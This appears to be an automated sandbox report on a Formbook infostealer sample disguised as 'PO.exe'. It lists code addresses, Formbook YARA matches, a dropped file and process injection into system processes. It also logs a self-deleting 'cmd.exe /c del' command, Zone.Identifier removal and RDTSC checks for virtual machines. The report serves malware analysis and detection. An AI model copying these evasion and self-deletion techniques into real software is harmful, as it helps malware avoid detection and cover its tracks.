Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00402D90	11_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041BF25	11_2_0041BF25
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B798	11_2_0041B798
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00402FB0	11_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00FF2050	11_2_00FF2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B54120	11_2_01B54120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3F900	11_2_01B3F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B620A0	11_2_01B620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4B090	11_2_01B4B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C028EC	11_2_01C028EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C020A8	11_2_01C020A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A830	11_2_01B5A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1002	11_2_01BF1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C0E824	11_2_01C0E824
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6EBB0	11_2_01B6EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF03DA	11_2_01BF03DA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFDBD2	11_2_01BFDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C02B28	11_2_01C02B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5AB40	11_2_01B5AB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C022AE	11_2_01C022AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BEFA2B	11_2_01BEFA2B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C025DD	11_2_01C025DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62581	11_2_01B62581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4D5E0	11_2_01B4D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B30D20	11_2_01B30D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C01D55	11_2_01C01D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C02D07	11_2_01C02D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4841F	11_2_01B4841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFD466	11_2_01BFD466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C0DFCE	11_2_01C0DFCE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C01FF1	11_2_01C01FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C02EF7	11_2_01C02EF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B56E30	11_2_01B56E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFD616	11_2_01BFD616
Source: C:\Windows\explorer.exe	Code function: 15_2_04DC72FF	15_2_04DC72FF
Source: C:\Windows\explorer.exe	Code function: 15_2_04DC48F9	15_2_04DC48F9
Source: C:\Windows\explorer.exe	Code function: 15_2_04DC9062	15_2_04DC9062
Source: C:\Windows\explorer.exe	Code function: 15_2_04DCA7C7	15_2_04DCA7C7
Source: C:\Windows\explorer.exe	Code function: 15_2_04DCB5B2	15_2_04DCB5B2
Source: C:\Windows\explorer.exe	Code function: 15_2_04DC5362	15_2_04DC5362
Source: C:\Windows\explorer.exe	Code function: 15_2_04DC4902	15_2_04DC4902
Source: C:\Windows\explorer.exe	Code function: 15_2_04DC7302	15_2_04DC7302
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E222AE	17_2_02E222AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E0FA2B	17_2_02E0FA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1DBD2	17_2_02E1DBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E103DA	17_2_02E103DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8EBB0	17_2_02D8EBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7AB40	17_2_02D7AB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E22B28	17_2_02E22B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E228EC	17_2_02E228EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6B090	17_2_02D6B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E220A8	17_2_02E220A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D820A0	17_2_02D820A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E2E824	17_2_02E2E824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E11002	17_2_02E11002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A830	17_2_02D7A830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D799BF	17_2_02D799BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5F900	17_2_02D5F900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D74120	17_2_02D74120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E22EF7	17_2_02E22EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D76E30	17_2_02D76E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1D616	17_2_02E1D616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E21FF1	17_2_02E21FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E2DFCE	17_2_02E2DFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1D466	17_2_02E1D466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6841F	17_2_02D6841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6D5E0	17_2_02D6D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E225DD	17_2_02E225DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D82581	17_2_02D82581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E21D55	17_2_02E21D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E22D07	17_2_02E22D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D50D20	17_2_02D50D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284B798	17_2_0284B798
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02832FB0	17_2_02832FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284B4A9	17_2_0284B4A9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284B4B6	17_2_0284B4B6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284C4F0	17_2_0284C4F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02838C70	17_2_02838C70
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02832D88	17_2_02832D88
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02832D90	17_2_02832D90

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 02D5B150 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 01B3B150 appears 72 times

Source: PO.exe	Binary or memory string: OriginalFilename vs PO.exe
Source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAddInProcess32.exeT vs PO.exe
Source: PO.exe, 00000000.00000002.762771390.00000000063C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs PO.exe
Source: PO.exe, 00000000.00000002.753647358.0000000002B31000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPe6.dll" vs PO.exe
Source: PO.exe, 00000000.00000002.763604937.00000000066C0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSHCore1.dll0 vs PO.exe

Source: PO.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/2@7/5

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to behavior

Source: PO.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PO.exe	Virustotal: Detection: 39%
Source: PO.exe	ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.793729525.0000000001C2F000.00000040.00000001.sdmp, wlanext.exe, 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000002.792851636.0000000000FF2000.00000002.00020000.sdmp, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wlanext.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00405915 push esi; iretd	11_2_00405918
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0040C2BE pushfd ; ret	11_2_0040C2BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B3C5 push eax; ret	11_2_0041B418
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B47C push eax; ret	11_2_0041B482
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B412 push eax; ret	11_2_0041B418
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B41B push eax; ret	11_2_0041B482
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041555D push ss; ret	11_2_0041555E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B8D0D1 push ecx; ret	11_2_01B8D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DAD0D1 push ecx; ret	17_2_02DAD0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0283C2BE pushfd ; ret	17_2_0283C2BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284B3C5 push eax; ret	17_2_0284B418
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02835915 push esi; iretd	17_2_02835918
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284CC92 pushfd ; iretd	17_2_0284CC93
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284B412 push eax; ret	17_2_0284B418
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284B41B push eax; ret	17_2_0284B482
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284B47C push eax; ret	17_2_0284B482
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284555D push ss; ret	17_2_0284555E

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\PO.exe

File opened: C:\Users\user\Desktop\PO.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000028385F4 second address: 00000000028385FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
